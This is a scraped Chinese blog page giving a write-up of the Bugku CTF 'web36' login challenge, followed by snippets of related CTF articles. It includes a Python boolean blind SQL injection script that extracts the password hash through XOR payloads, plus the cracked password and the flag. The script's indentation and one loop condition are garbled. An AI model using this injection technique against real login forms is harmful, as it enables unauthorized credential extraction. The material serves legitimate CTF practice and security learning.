ctf wed login.php,Bugku CTF web36(Web)

最新推荐文章于 2022-05-12 22:51:19 发布
最新推荐文章于 2022-05-12 22:51:19 发布
阅读量344 收藏
点赞数
文章标签: ctf wed login.php

0、打开网页,查看题目描述

描  述: 全都过滤了绝望吗?

0497bf5dcad4084d43d3c2019ad92489.png

根据描述,说明是盲注

1、编写python脚本,运行获取密码

import requests

session = requests.Session()

url="http://114.67.246.176:15649//login.php"

flag=''

for i in range(1,250):

left=32

right=128

mid=(left+right)//2

while(left

payload="admin'^((ascii(mid((select(group_concat(passwd)))from(%s)))>%s))^'1"%(i,mid)

data = {'uname': payload, 'passwd': 'admin'}

res = requests.post(url, data=data)

if 'password' in res.text:

left=mid+1

else:

right=mid

mid=(left+right)//2

if(mid==32 or mid==127):

break

flag=flag+chr(mid)

print(flag)

5ad1dccf6da1934e8f5373c575ffcae6.png

2、进行md5解密

7d36377ab3e62b09ac15a95ab4e20951.png

得到密码:bugkuctf

3、登陆网页,cat

020333a1c968eef15ab1f94d99546eda.png

4、得到flag:flag{66993b2d104d9e1dd7b7d9ffc69795d7}

一切都在坠落
关注
PwnTheBox(web篇)简单题
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-26 3072
PwnTheBox(web篇)简单题 第一页 exec1 hackergame2019-签到题 网页读取器 管理员本地访问 下载下载 快速计算 该网站已经被黑 PwnTheBox 百度网盘分享链接 Get Post 睿智题目 一道很奇怪的题目 奇葩的题目 验证码 XSS 达拉崩吧大冒险 atchap php是世界上最好的语言 exec2 第二页 Twice SQL Injection 猫咪银行 黑曜石浏览器 信息安全
PWN uaf [pwnable.kr]CTF writeup题解系列13
重新启程
01-02 745
目录 0x01题目 0x02解题思路 0x03题解 0x01题目 0x02解题思路 题目都已经介绍了这是一道Use After Free的题目,那我们就不用多想了,先看看题目主要内容 root@mypwn:/ctf/work/pwnable.kr# ssh uaf@pwnable.kr -p2222 uaf@pwnable.kr's password: ____ __...
BugkuCTF-WEBlogin1
am_03的博客
08-29 1399
知识点 存在SQL约束攻击的网站,注册时通过数据库已有账户例如admin+大量空格,随意密码点击注册,后端先在数据库查找select,将已有账户扩充相同长度,已有账户与注册账户(有大量空格)不等,因为有效长度不同(已有账户扩充的长度不为有效长度),之后插入insert,截断注册账户的多余长度,但后面为大量的空格,由于在SQL里执行字符串处理时,字符串末尾的空格符将会被删除,所以最后插入的注册账户即为已有账户admin,密码成为注册时的密码,即可成功登陆。 补充: 简单来说:就是在注册页面通过大量空格来超过s
ctf wed login.php,ctfWEB之后台登录
weixin_39759600的博客
03-27 875
格式:flag:{xxx}解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php打开链接: 查看源码,发现一段被注释的代码,有用: 仔细分析这一句:$sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'";其实这...
ctf wed login.php,HCTF2018-WEB-详细Write up
weixin_39943926的博客
03-27 712
良心比赛,这次的web题质量很高,做的很爽,跟着Delta的师傅们也学到了不少东西,发现自己还是tcl跟大佬们差得很远。Warmup参考:https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/ 根据提示找到source.phpclass emmm{public static function check...
php基于错误的盲注,Bugku-CTFlogin3(SKCTF)(基于布尔的SQL盲注)
weixin_36161279的博客
04-14 217
Day41login3(SKCTF)http://123.206.31.85:49167/flag格式:SKCTF{xxxxxxxxxxxxx}hint:基于布尔的SQL盲注本题要点:异或运算、布尔盲注、过滤打开是一个登录窗口用bp抓一下包发送至repeater没什么新发现........随便试试其他用户名,看看回显信息我们可以发现当我们随便输入一个用户名“qwe”时, 回显用户名不存在,但并没有...
i春秋CTF训练 Web Login
椰奶冻不安全的博客
07-04 5045
Web Login 题目内容:加油,我看好你 本题由擂主Wfox提供 题目链接请在i春秋申请 访问发现是个登录页面,还以为是爆破弱口令,结果在页面源码里看到一行注释 <!-- test1 test1 --> 试了一下成功登录,然后重定向到了member.php页面,发现页面里啥也没有 只能用burpsuite抓包看看了,然后在response的headers里发现可疑参数show 然后在request的headers里添加一个show参数,值设置为1,发送,页面返回了php源码
PWN lotto [pwnable.kr]CTF writeup题解系列10
重新启程
01-02 833
目录 0x01题目 0x02解题思路 0x03题解 0x01题目 0x02解题思路 下载文件,检查一下情况 root@mypwn:/ctf/work/pwnable.kr# ssh lotto@pwnable.kr -p2222 lotto@pwnable.kr's password: ____ __ __ ____ ____ ____ ...
PWN passcode [pwnable.kr]CTF writeup题解系列5
重新启程
01-01 916
直接看题目: 连接服务器看看情况: root@mypwn:/ctf/work/pwnable.kr# ssh passcode@pwnable.kr -p2222 passcode@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | \|...
SWPU 2016 web 部分思路整理
Bendawang's Blog
11-01 4121
SWPU 2016 web 部分思路整理
ctf+管理员登录+php,一道有意思的CTF题目
weixin_28224217的博客
03-20 2336
前言近期在整理题目的时候,发现了一道质量不错的Web题,出自2019 TMCTF Final,特此记录一下。信息搜集题目描述:Hack the following server.http://10.0.106.(team number)/User NamePasswordguestpasswordadmin(Unknown)Note: You do not have to use way of b...
ctfWEB之后台登录
weixin_30340745的博客
06-02 1798
1、后台登录 格式:flag:{xxx} 解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 打开链接: 查看源码,发现一段被注释的代码,有用: 仔细分析这一句: $sql = "SELECT * FROM admin WHERE username = 'admin' and password ...
webbug php盲注,CTF-WEB 一个登录框SQL盲注
weixin_36012215的博客
03-28 237
标签下的内容 没办法 又去学习一下“美丽的汤”Beautifulsoup 解析网页首先放上一段测试代码:# -*- coding:utf-8 -*-from bs4 import BeautifulSoupimport requestssession = requests.Session()paramsPost = {"password":"1","username":"admin"}hea...
welcome_to_bugkuctfLogin3的writeup
jiyi_guoshu的博客
07-14 571
信息安全实习实训报告 由于我的电脑落在了教室里,所以我只能以md文档的形式提交我的这次报告。 bugku 反序列化漏洞 题目地址: welcome_to_bugkuctf 1 .打开网址,提示you are not the number of bugku ! 老规矩,看源码: <html><head></head><body>you are not...
CTF】考核比赛知识准备WEB部分(一)php和mysql
lanlanla的成长历程
10-07 1150
目录 WEB知识回顾 php概述: php功能实现: 1.表单提交: 2. include文件包含: PHP连接数据库 php漏洞demo搭建 1.phpstudy中数据库的导出和导入: 任务 编写一个登陆界面: 编写一个留言板: 编写一个图书管理系统 ①创建相关数据库 ②编写相关配置等文件 WEB知识回顾 php概述: php代码在服务器上进行执行,结...
ctf-WEB-login2(sql注入)
god_001的博客
05-12 2818
题目地址:跳转提示 打开网址,是一个熟悉的登陆页面,几次登录尝试发现报错回显只有一种 应当不是基于布尔的盲注,bp抓包看看: 发现响应中有一串奇怪的字符,尝试使用base64解码,得到: 这应该是一个提示,需要绕过其判断条件 这里就可以利用联合查询来注入(union select) 之前说过,union select后面加数字串时,如果没有后面的表名,则该语句没有向任何一个数据库查询,那么它输出的内容就是select后的数字,并且使用联合查询要求必须保证前后查询的字段数一致,因此要绕
CTF练习题[WEB]-点login咋没反应
weixin_45246254的博客
02-10 2600
https://ctf.bugku.com/challenges/detail/id/109.html?page=1 拿到题目如下 点击登录没有反应 扫目录发现admin.css 尝试提交参数 需要在elseif处获得flag 先把KEY进行序列化 放入cookie中,获得flag
ctf解题--后台登录(web)
热门推荐
qq_36791003的博客
08-16 1万+
题目 格式:flag:{xxx} 解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 打开连接 查看源码 通过post方式给password变量传值 md5加密后拼接sql查询语句到后台执行 后面的判断就是要求sql语句要成功执行 MD5函数 参考链接:http://www.w3school.com.cn/ph...
Bugkuweb login1(SKCTF)
qq_26961571的博客
09-08 344
打开这道题之后,发现有很明显的提示: 点击链接进去, 感觉是数据库sql有关的攻击,所以先试一试 注册能成功吗??当然是不能的。 所以直接开始查找SQL约束攻击是什么意思。【因为菜】 看完之后,总结一下知识点。 1. 在SQL中执行字符串处理时,字符串末尾的空格符将会被删除 2.在所有的INSERT查询中,SQL都会根据varchar(n)来限制字符串的最大长度。也就是说,如果字符串的长度大于“n”个字符的话,那么仅使...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值